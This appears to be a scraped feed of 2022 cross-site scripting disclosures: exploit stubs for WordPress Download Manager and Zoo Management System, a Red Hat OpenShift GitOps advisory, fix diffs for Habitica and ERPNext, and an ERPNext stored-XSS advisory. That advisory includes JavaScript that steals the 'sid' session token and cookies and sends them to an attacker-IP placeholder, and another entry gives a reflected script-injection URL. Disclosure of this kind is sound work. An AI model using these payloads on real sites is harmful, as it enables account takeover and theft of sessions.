WordPress Download Manager plugin versions 3.2.43 and below suffer from a cross site scripting vulnerability.

Change Mirror Download

    Exploit Title: Download Manager Cross-Site ScriptingDate: 2022-06-16Exploit Author :  Andrea BocchettiVendor Homepage : https://wordpress.org/plugins/download-manager/Version :  <= 3.2.43Tested on: windowsCVE :  CVE-2022-2101######## Description ######### 1-) Login in the plugin page# 2-) add the xss payload in the field "Insert URL"# 3-) Click on the link , the JS code will be interpreted.

WordPress Download Manager 3.2.43 Cross Site Scripting

Zoo Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)# Date: 06/22/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: Server: XAMPP on Windows 10 # CVE: CVE-2022-31897# Description:Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.# Impact:An attacker could steal cookies with a crafted URL sent to the victims.# Exploit:Visit the following page: 1) http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script>2) Alert pop up is fired!# Image poc:https://ibb.co/8XKDgJX -> Registration pagehttps://ibb.co/mTTmTmy -> XSS

Zoo Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2022-5152-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2022:5152-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5152  
Issue date:        2022-06-22  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-31016  
                   CVE-2022-31034 CVE-2022-31035 CVE-2022-31036  
====================================================================  
1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.5.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift GitOps is a declarative way to implement continuous  
deployment for cloud native applications.

Security Fix(es):

* argocd: vulnerable to a variety of attacks when an SSO login is initiated  
from the Argo CD CLI or the UI. (CVE-2022-31034)

* argocd: cross-site scripting (XSS) allows a malicious user to inject a  
javascript link in the UI (CVE-2022-31035)

* argocd: vulnerable to an uncontrolled memory consumption bug  
(CVE-2022-31016)

* argocd: vulnerable to a symlink following bug allowing a malicious user  
with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI  
2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.  
2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug  
2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-31016  
https://access.redhat.com/security/cve/CVE-2022-31034  
https://access.redhat.com/security/cve/CVE-2022-31035  
https://access.redhat.com/security/cve/CVE-2022-31036  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrLob9zjgjWX9erEAQhsxw/9EbM8BdLUASvR5jVTtZeDXjOavkH9ob65  
/W+vtrpycWaOGKLm0sVZDnH9Y/iNy5io1vbTp3qseFXzCJVSnOrBmPc21VLHpCnJ  
mZ/apMKfS4HONdDqEOlwxFXPyZfp4M8ms7XdEKxEyabBdL5deL/ZhOzg1nbUWXwy  
JdDrll9oGk9HsUFqaVyM7+tOsT+a0g7SliFoXFDDF684W3JI6uL3y6ejKEEiBXOd  
649AoBnIaGyNT37BK/JaItpJj3EhmhavBs5OILDdrIzvBsjIBtVfyPNMfRjrzCEB  
qAa9CRfUT3daBK9bdx3P5X8MDXGlXEUKOOJGTwlCSk6d/mshET9AWKaJNyOdRxHJ  
U1MPlspWjb+ADXqCNB3zaQgmOaPj4lYsT9dT738JHtW+VIUAGs+KVsslizIAV9uF  
KZkJIrPqL5g9hQN4lt2uB3iLC0e1prSSZsXZLXCLFcxXObLUYV83ChFBJxaEGmMl  
VeFmgasL0LkhbH/9O4taHdwRRqMCOTshQE4N8jfqyo2jA2clPAua0vE840qSNz03  
2aEi/5J7oGV/z1wuZtklTTJGBVs2qGkhdYvqAF2wKkXPEhaoWyqhUn1dqnjGIrk+  
JJ43POziAdewPlIKN4OBkPgfTjfGWW5wy/RkMnTLtamObkF5AANQF7a8D4TcCdod  
UfPGO4T/krI=jReJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5152-01

In habitica versions v4.119.0 through v4.232.2 are vulnerable to DOM XSS via the login page.

Permalink

Browse files

fix(login): catch double-slash exploit

*   Loading branch information

SabreCat committed

May 20, 2022

1 parent 980e358 commit 5bcfdbe066e8c899f3ecf3fdcdbacc2ecba7f02f

Showing **1 changed file** with **2 additions** and **2 deletions**.

@@ -757,8 +757,8 @@ export default {

}, 500),

sanitizeRedirect (redirect) {

if (!redirect) return '/';

let sanitizedString \= DOMPurify.sanitize(redirect);

if (sanitizedString.slice(0, 1) !== '/') sanitizedString \= \`/${sanitizedString}\`;

let sanitizedString \= DOMPurify.sanitize(redirect).replace(/\\\\|\\/\\/|\\./g, '');

sanitizedString \= \`/${sanitizedString}\`;

return sanitizedString;

},

async register () {

**0 comments on commit 5bcfdbe**

Please sign in to comment.

CVE-2022-23077: fix(login): catch double-slash exploit · HabitRPG/habitica@5bcfdbe

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.

CVE-2022-2174

In ERPNext, versions v13.0.0-beta.13 through v13.30.0 are vulnerable to Stored XSS at the Patient History page which allows a low privilege user to conduct an account takeover attack.

frappe.provide('frappe.patient\_history'); frappe.pages\['patient\_history'\].on\_page\_load \= function(wrapper) { let me \= this; let page \= frappe.ui.make\_app\_page({ parent: wrapper, title: 'Patient History', single\_column: true }); frappe.breadcrumbs.add('Healthcare'); let pid \= ''; page.main.html(frappe.render\_template('patient\_history', {})); page.main.find('.header-separator').hide(); let patient \= frappe.ui.form.make\_control({ parent: page.main.find('.patient'), df: { fieldtype: 'Link', options: 'Patient', fieldname: 'patient', placeholder: \_\_('Select Patient'), only\_select: true, change: function() { let patient\_id \= patient.get\_value(); if (pid != patient\_id && patient\_id) { me.start \= 0; me.page.main.find('.patient\_documents\_list').html(''); setup\_filters(patient\_id, me); get\_documents(patient\_id, me); show\_patient\_info(patient\_id, me); show\_patient\_vital\_charts(patient\_id, me, 'bp', 'mmHg', 'Blood Pressure'); } pid \= patient\_id; } }, }); patient.refresh(); if (frappe.route\_options) { patient.set\_value(frappe.route\_options.patient); } this.page.main.on('click', '.btn-show-chart', function() { let btn\_show\_id \= $(this).attr('data-show-chart-id'), pts \= $(this).attr('data-pts'); let title \= $(this).attr('data-title'); show\_patient\_vital\_charts(patient.get\_value(), me, btn\_show\_id, pts, title); }); this.page.main.on('click', '.btn-more', function() { let doctype \= $(this).attr('data-doctype'), docname \= $(this).attr('data-docname'); if (me.page.main.find('.'+docname).parent().find('.document-html').attr('data-fetched') \== '1') { me.page.main.find('.'+docname).hide(); me.page.main.find('.'+docname).parent().find('.document-html').show(); } else { if (doctype && docname) { let exclude \= \['patient', 'patient\_name', 'patient\_sex', 'encounter\_date'\]; frappe.call({ method: 'erpnext.healthcare.utils.render\_doc\_as\_html', args:{ doctype: doctype, docname: docname, exclude\_fields: exclude }, freeze: true, callback: function(r) { if (r.message) { me.page.main.find('.' + docname).hide(); me.page.main.find('.' + docname).parent().find('.document-html').html( \`${r.message.html} <div align='center'> <a class='btn octicon octicon-chevron-up btn-default btn-xs btn-less' data-doctype='${doctype}' data-docname='${docname}'> </a> </div> \`); me.page.main.find('.' + docname).parent().find('.document-html').show(); me.page.main.find('.' + docname).parent().find('.document-html').attr('data-fetched', '1'); } } }); } } }); this.page.main.on('click', '.btn-less', function() { let docname \= $(this).attr('data-docname'); me.page.main.find('.' + docname).parent().find('.document-id').show(); me.page.main.find('.' + docname).parent().find('.document-html').hide(); }); me.start \= 0; me.page.main.on('click', '.btn-get-records', function() { get\_documents(patient.get\_value(), me); }); }; let setup\_filters \= function(patient, me) { $('.doctype-filter').empty(); frappe.xcall( 'erpnext.healthcare.page.patient\_history.patient\_history.get\_patient\_history\_doctypes' ).then(document\_types \=> { let doctype\_filter \= frappe.ui.form.make\_control({ parent: $('.doctype-filter'), df: { fieldtype: 'MultiSelectList', fieldname: 'document\_type', placeholder: \_\_('Select Document Type'), input\_class: 'input-xs', change: () \=> { me.start \= 0; me.page.main.find('.patient\_documents\_list').html(''); get\_documents(patient, me, doctype\_filter.get\_value(), date\_range\_field.get\_value()); }, get\_data: () \=> { return document\_types.map(document\_type \=> { return { description: document\_type, value: document\_type }; }); }, } }); doctype\_filter.refresh(); $('.date-filter').empty(); let date\_range\_field \= frappe.ui.form.make\_control({ df: { fieldtype: 'DateRange', fieldname: 'date\_range', placeholder: \_\_('Date Range'), input\_class: 'input-xs', change: () \=> { let selected\_date\_range \= date\_range\_field.get\_value(); if (selected\_date\_range && selected\_date\_range.length \=== 2) { me.start \= 0; me.page.main.find('.patient\_documents\_list').html(''); get\_documents(patient, me, doctype\_filter.get\_value(), selected\_date\_range); } } }, parent: $('.date-filter') }); date\_range\_field.refresh(); }); }; let get\_documents \= function(patient, me, document\_types\="", selected\_date\_range\="") { let filters \= { name: patient, start: me.start, page\_length: 20 }; if (document\_types) filters\['document\_types'\] \= document\_types; if (selected\_date\_range) filters\['date\_range'\] \= selected\_date\_range; frappe.call({ 'method': 'erpnext.healthcare.page.patient\_history.patient\_history.get\_feed', args: filters, callback: function(r) { let data \= r.message; if (data.length) { add\_to\_records(me, data); } else { me.page.main.find('.patient\_documents\_list').append(\` <div class='text-muted' align='center'> <br><br>${\_\_('No more records..')}<br><br> </div>\`); me.page.main.find('.btn-get-records').hide(); } } }); }; let add\_to\_records \= function(me, data) { let details \= "<ul class='nav nav-pills nav-stacked'>"; let i; for (i\=0; i<data.length; i++) { if (data\[i\].reference\_doctype) { let label \= ''; if (data\[i\].subject) { label += "<br/>" + data\[i\].subject; } data\[i\] \= add\_date\_separator(data\[i\]); if (frappe.user\_info(data\[i\].owner).image) { data\[i\].imgsrc \= frappe.utils.get\_file\_link(frappe.user\_info(data\[i\].owner).image); } else { data\[i\].imgsrc \= false; } let time\_line\_heading \= data\[i\].practitioner ? \`${data\[i\].practitioner} \` : \`\`; time\_line\_heading += data\[i\].reference\_doctype + " - " + \`<a onclick="frappe.set\_route('Form', '${data\[i\].reference\_doctype}', '${data\[i\].reference\_name}');"> ${data\[i\].reference\_name} </a>\`; details += \` <li data-toggle='pill' class='patient\_doc\_menu' data-doctype='${data\[i\].reference\_doctype}' data-docname='${data\[i\].reference\_name}'> <div class='col-sm-12 d-flex border-bottom py-3'>\`; if (data\[i\].imgsrc) { details += \` <span class='mr-3'> <img class='avtar' src='${data\[i\].imgsrc}' width='32' height='32'></img> </span>\`; } else { details += \`<span class='mr-3 avatar avatar-small' style='width:32px; height:32px;'> <div align='center' class='standard-image' style='background-color: #fafbfc;'> ${data\[i\].practitioner ? data\[i\].practitioner.charAt(0) : 'U'} </div> </span>\`; } details += \`<div class='d-flex flex-column width-full'> <div> \`+time\_line\_heading+\` <span> ${data\[i\].date\_sep} </span> </div> <div class='Box p-3 mt-2'> <span class='${data\[i\].reference\_name} document-id'>${label} <div align='center'> <a class='btn octicon octicon-chevron-down btn-default btn-xs btn-more' data-doctype='${data\[i\].reference\_doctype}' data-docname='${data\[i\].reference\_name}'> </a> </div> </span> <span class='document-html' hidden data-fetched="0"> </span> </div> </div> </div> </li>\`; } } details += '</ul>'; me.page.main.find('.patient\_documents\_list').append(details); me.start += data.length; if (data.length \=== 20) { me.page.main.find(".btn-get-records").show(); } else { me.page.main.find(".btn-get-records").hide(); me.page.main.find(".patient\_documents\_list").append(\` <div class='text-muted' align='center'> <br><br>${\_\_('No more records..')}<br><br> </div>\`); } }; let add\_date\_separator \= function(data) { let date \= frappe.datetime.str\_to\_obj(data.communication\_date); let pdate \= ''; let diff \= frappe.datetime.get\_day\_diff(frappe.datetime.get\_today(), frappe.datetime.obj\_to\_str(date)); if (diff < 1) { pdate \= \_\_('Today'); } else if (diff < 2) { pdate \= \_\_('Yesterday'); } else { pdate \= \_\_('on ') + frappe.datetime.global\_date\_format(date); } data.date\_sep \= pdate; return data; }; let show\_patient\_info \= function(patient, me) { frappe.call({ 'method': 'erpnext.healthcare.doctype.patient.patient.get\_patient\_detail', args: { patient: patient }, callback: function(r) { let data \= r.message; let details \= ''; if (data.image) { details += \`<div><img class='thumbnail' width=75% src='${data.image}'></div>\`; } details += \`<b> ${data.patient\_name} </b><br> ${data.sex}\`; if (data.email) details += \`<br> ${data.email}\`; if (data.mobile) details += \`<br> ${data.mobile}\`; if (data.occupation) details += \`<br><br><b> ${\_\_('Occupation')} : </b> ${data.occupation}\`; if (data.blood\_group) details += \`<br><b> ${\_\_('Blood Group')} : </b> ${data.blood\_group}\`; if (data.allergies) details += \`<br><br><b> ${\_\_('Allerigies')} : </b> ${data.allergies.replace("\\n", ", ")}\`; if (data.medication) details += \`<br><b> ${\_\_('Medication')} : </b> ${data.medication.replace("\\n", ", ")}\`; if (data.alcohol\_current\_use) details += \`<br><br><b> ${\_\_('Alcohol use')} : </b> ${data.alcohol\_current\_use}\`; if (data.alcohol\_past\_use) details += \`<br><b> ${\_\_('Alcohol past use')} : </b> ${data.alcohol\_past\_use}\`; if (data.tobacco\_current\_use) details += \`<br><b> ${\_\_('Tobacco use')} : </b> ${data.tobacco\_current\_use}\`; if (data.tobacco\_past\_use) details += \`<br><b> ${\_\_('Tobacco past use')} : </b> ${data.tobacco\_past\_use}\`; if (data.medical\_history) details += \`<br><br><b> ${\_\_('Medical history')} : </b> ${data.medical\_history.replace("\\n", ", ")}\`; if (data.surgical\_history) details += \`<br><b> ${\_\_('Surgical history')} : </b> ${data.surgical\_history.replace("\\n", ", ")}\`; if (data.surrounding\_factors) details += \`<br><br><b> ${\_\_('Occupational hazards')} : </b> ${data.surrounding\_factors.replace("\\n", ", ")}\`; if (data.other\_risk\_factors) details += \`<br><b> ${\_\_('Other risk factors')} : </b> ${data.other\_risk\_factors.replace("\\n", ", ")}\`; if (data.patient\_details) details += \`<br><br><b> ${\_\_('More info')} : </b> ${data.patient\_details.replace("\\n", ", ")}\`; if (details) { details \= \`<div style='padding-left:10px; font-size:13px;' align='left'>\` + details + \`</div>\`; } me.page.main.find('.patient\_details').html(details); } }); }; let show\_patient\_vital\_charts \= function(patient, me, btn\_show\_id, pts, title) { frappe.call({ method: 'erpnext.healthcare.utils.get\_patient\_vitals', args:{ patient: patient }, callback: function(r) { if (r.message) { let show\_chart\_btns\_html \= \` <div style='padding-top:10px;'> <a class='btn btn-default btn-xs btn-show-chart' data-show-chart-id='bp' data-pts='mmHg' data-title='Blood Pressure'> ${\_\_('Blood Pressure')} </a> <a class='btn btn-default btn-xs btn-show-chart' data-show-chart-id='pulse\_rate' data-pts='per Minutes' data-title='Respiratory/Pulse Rate'> ${\_\_('Respiratory/Pulse Rate')} </a> <a class='btn btn-default btn-xs btn-show-chart' data-show-chart-id='temperature' data-pts='°C or °F' data-title='Temperature'> ${\_\_('Temperature')} </a> <a class='btn btn-default btn-xs btn-show-chart' data-show-chart-id='bmi' data-pts='' data-title='BMI'> ${\_\_('BMI')} </a> </div>\`; me.page.main.find('.show\_chart\_btns').html(show\_chart\_btns\_html); let data \= r.message; let labels \= \[\], datasets \= \[\]; let bp\_systolic \= \[\], bp\_diastolic \= \[\], temperature \= \[\]; let pulse \= \[\], respiratory\_rate \= \[\], bmi \= \[\], height \= \[\], weight \= \[\]; for (let i\=0; i<data.length; i++) { labels.push(data\[i\].signs\_date+'||'+data\[i\].signs\_time); if (btn\_show\_id \=== 'bp') { bp\_systolic.push(data\[i\].bp\_systolic); bp\_diastolic.push(data\[i\].bp\_diastolic); } if (btn\_show\_id \=== 'temperature') { temperature.push(data\[i\].temperature); } if (btn\_show\_id \=== 'pulse\_rate') { pulse.push(data\[i\].pulse); respiratory\_rate.push(data\[i\].respiratory\_rate); } if (btn\_show\_id \=== 'bmi') { bmi.push(data\[i\].bmi); height.push(data\[i\].height); weight.push(data\[i\].weight); } } if (btn\_show\_id \=== 'temperature') { datasets.push({name: 'Temperature', values: temperature, chartType: 'line'}); } if (btn\_show\_id \=== 'bmi') { datasets.push({name: 'BMI', values: bmi, chartType: 'line'}); datasets.push({name: 'Height', values: height, chartType: 'line'}); datasets.push({name: 'Weight', values: weight, chartType: 'line'}); } if (btn\_show\_id \=== 'bp') { datasets.push({name: 'BP Systolic', values: bp\_systolic, chartType: 'line'}); datasets.push({name: 'BP Diastolic', values: bp\_diastolic, chartType: 'line'}); } if (btn\_show\_id \=== 'pulse\_rate') { datasets.push({name: 'Heart Rate / Pulse', values: pulse, chartType: 'line'}); datasets.push({name: 'Respiratory Rate', values: respiratory\_rate, chartType: 'line'}); } new frappe.Chart('.patient\_vital\_charts', { data: { labels: labels, datasets: datasets }, title: title, type: 'axis-mixed', height: 200, colors: \['purple', '#ffa3ef', 'light-blue'\], tooltipOptions: { formatTooltipX: d \=> (d + '').toUpperCase(), formatTooltipY: d \=> d + ' ' + pts, } }); me.page.main.find('.header-separator').show(); } else { me.page.main.find('.patient\_vital\_charts').html(''); me.page.main.find('.show\_chart\_btns').html(''); me.page.main.find('.header-separator').hide(); } } }); };

CVE-2022-23056: erpnext/patient_history.js at 21a3ea462aaf319e466c067c2ec406eb9abe6ed3 · frappe/erpnext

In ERPNext, versions v12.0.9--v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.

@@ -2,17 +2,22 @@ \# MIT License. See license.txt  
from \_\_future\_\_ import unicode\_literals  
from werkzeug.wrappers import Response from six import text\_type, string\_types, StringIO  
import frappe from frappe import \_ import frappe.utils import frappe.sessions import frappe.desk.form.run\_method from frappe.utils.response import build\_response from frappe.api import validate\_auth  
from frappe.utils import cint from frappe.api import validate\_auth from frappe import \_, is\_whitelisted from frappe.utils.response import build\_response from frappe.utils.csvutils import build\_csv\_response from frappe.core.doctype.server\_script.server\_script\_utils import run\_server\_script\_api from werkzeug.wrappers import Response from six import string\_types  
  
ALLOWED\_MIMETYPES \= ('image/png', 'image/jpeg', 'application/pdf', 'application/msword', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', @@ -64,8 +69,9 @@ def execute\_cmd(cmd, from\_async=False): if from\_async: method \= method.queue  
is\_whitelisted(method) is\_valid\_http\_method(method) if method != run\_doc\_method: is\_whitelisted(method) is\_valid\_http\_method(method)  
return frappe.call(method, \*\*frappe.form\_dict)  
@@ -75,31 +81,10 @@ def is\_valid\_http\_method(method): if http\_method not in frappe.allowed\_http\_methods\_for\_whitelisted\_func\[method\]: frappe.throw(\_("Not permitted"), frappe.PermissionError)  
def is\_whitelisted(method): \# check if whitelisted if frappe.session\['user'\] \== 'Guest': if (method not in frappe.guest\_methods): frappe.throw(\_("Not permitted"), frappe.PermissionError)  
if method not in frappe.xss\_safe\_methods: \# strictly sanitize form\_dict \# escapes html characters like <> except for predefined tags like a, b, ul etc. for key, value in frappe.form\_dict.items(): if isinstance(value, string\_types): frappe.form\_dict\[key\] \= frappe.utils.sanitize\_html(value)  
else: if not method in frappe.whitelisted: frappe.throw(\_("Not permitted"), frappe.PermissionError)  
@frappe.whitelist(allow\_guest\=True) def version(): return frappe.\_\_version\_\_  
@frappe.whitelist() def runserverobj(method, docs\=None, dt\=None, dn\=None, arg\=None, args\=None): frappe.desk.form.run\_method.runserverobj(method, docs\=docs, dt\=dt, dn\=dn, arg\=arg, args\=args)  
@frappe.whitelist(allow\_guest\=True) def logout(): frappe.local.login\_manager.logout() @@ -112,15 +97,6 @@ def web\_logout(): frappe.respond\_as\_web\_page(\_("Logged Out"), \_("You have been successfully logged out"), indicator\_color\='green')  
@frappe.whitelist(allow\_guest\=True) def run\_custom\_method(doctype, name, custom\_method): """cmd=run\_custom\_method&doctype={doctype}&name={name}&custom\_method={custom\_method}""" doc \= frappe.get\_doc(doctype, name) if getattr(doc, custom\_method, frappe.\_dict()).is\_whitelisted: frappe.call(getattr(doc, custom\_method), \*\*frappe.local.form\_dict) else: frappe.throw(\_("Not permitted"), frappe.PermissionError)  
@frappe.whitelist() def uploadfile(): ret \= None @@ -222,6 +198,65 @@ def get\_attr(cmd): frappe.log("method:" + cmd) return method  
@frappe.whitelist(allow\_guest \= True) @frappe.whitelist(allow\_guest\=True) def ping(): return "pong"  
@frappe.whitelist() def run\_doc\_method(method, docs\=None, dt\=None, dn\=None, arg\=None, args\=None): """run controller method - old style""" import json, inspect  
if not args: args \= arg or ""  
if dt: \# not called from a doctype (from a page) if not dn: dn \= dt \# single doc \= frappe.get\_doc(dt, dn)  
else: doc \= frappe.get\_doc(json.loads(docs)) doc.\_original\_modified \= doc.modified doc.check\_if\_latest()  
if not doc.has\_permission("read"): frappe.msgprint(\_("Not permitted"), raise\_exception \= True)  
if not doc: return  
try: args \= json.loads(args) except ValueError: args \= args  
method\_obj \= getattr(doc, method) is\_whitelisted(getattr(method\_obj, '\_\_func\_\_', method\_obj))  
try: fnargs \= inspect.getargspec(method\_obj)\[0\] except ValueError: fnargs \= inspect.getfullargspec(method\_obj).args  
if not fnargs or (len(fnargs)\==1 and fnargs\[0\]\=="self"): r \= doc.run\_method(method)  
elif "args" in fnargs or not isinstance(args, dict): r \= doc.run\_method(method, args)  
else: r \= doc.run\_method(method, \*\*args)  
frappe.response.docs.append(doc)  
if not r: return  
\# build output as csv if cint(frappe.form\_dict.get('as\_csv')): build\_csv\_response(r, doc.doctype.replace(' ', '')) return  
frappe.response\['message'\] \= r  
\# for backwards compatibility runserverobj \= run\_doc\_method

CVE-2022-23057: feat: frappe.whitelist for class methods · frappe/frappe@497ea86

ERPNext in versions v12.0.9-v13.0.3 are affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’ which can lead to full account takeover.

**Overview**

In ERPNext, versions v12.0.9-v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.

**Details**

ERPNext is affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’.  
These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. The victim who inadvertently triggers the attack, can be a highly privileged user, such as an administrator, so the injected scripts can extract the sid token and cookies, which can lead to full Account takeover and Privilege escalation. Moreover, there is an availability issue, once the JavaScript payload is stored on the server, the victim would not be able to browse through the platform.

**PoC Details**

1\. Login to the application with low privileged user  
2\. Go to the settings option in the navigation bar and select my Settings.  
3\. Provide the malicious script in the ‘username’ field and click save. (from the PoC code)  
4\. Create a file named ‘test1.js’ and run an HTTP server (like python simple http server)

the content of the ‘test1.js’ file:  
var re = /\\\\"sid\\\\":\\\\s\\\\"\[0-9a-zA-Z\]+\\\\"/gm;  
var te = /\[0-9a-zA-Z\]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);  
getSID = getSID\[0\].split(':');  
getSID = getSID\[1\].match(te);  
console.log(getSID);  
url = 'http://\[attacker-ip\]:\[attacker-port\]/?sid='+getSID;  
var script = document.createElement('script');  
script.src = url+"&details= " + document.cookie;  
document.getElementsByTagName('head')\[0\].appendChild(script);

5\. open a tab in Incognito and go to the ERPNext server and login with a high privileged user , it will be redirected to the malicious page.  
6\. After a successful login, the ‘sid’ parameter will be sent to the Attacker which can then use it to login as Administrator

**PoC Code**

    
    

**Affected Environments**

ERPNext versions v12.0.9 through v13.0.3

**Prevention**

Upgrade to ERPNext version 13.1.0

CVE-2022-23058: Mend Vulnerability Database

An update is now available for Red Hat OpenShift GitOps 1.5.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-31016: argocd: vulnerable to an uncontrolled memory consumption bug
* CVE-2022-31034: argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.
* CVE-2022-31035: argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI
* CVE-2022-31036: argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-06-22

Updated:

2022-06-22

**RHSA-2022:5152 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: Red Hat OpenShift GitOps security update

**Type/Severity**

Security Advisory: Important

**Topic**

An update is now available for Red Hat OpenShift GitOps 1.5.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.  

Security Fix(es):  

*   argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI. (CVE-2022-31034)
*   argocd: cross-site scripting (XSS) allows a malicious user to inject a javascript link in the UI (CVE-2022-31035)
*   argocd: vulnerable to an uncontrolled memory consumption bug (CVE-2022-31016)
*   argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat OpenShift GitOps 1.5 x86\_64

**Fixes**

*   BZ - 2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI
*   BZ - 2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.
*   BZ - 2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug
*   BZ - 2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

**CVEs**

*   CVE-2018-25032
*   CVE-2022-1271
*   CVE-2022-31016
*   CVE-2022-31034
*   CVE-2022-31035
*   CVE-2022-31036

**Red Hat OpenShift GitOps 1.5**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:5152: Red Hat Security Advisory: Red Hat OpenShift GitOps security update

There is a Cross Site Scripting Stored (XSS) vulnerability in NukeViet CMS before 4.5.02.

**Cross-site Scripting in NukeViet CMS**

Moderate severity GitHub Reviewed Published Jun 22, 2022 • Updated Jun 23, 2022

Tag

#xss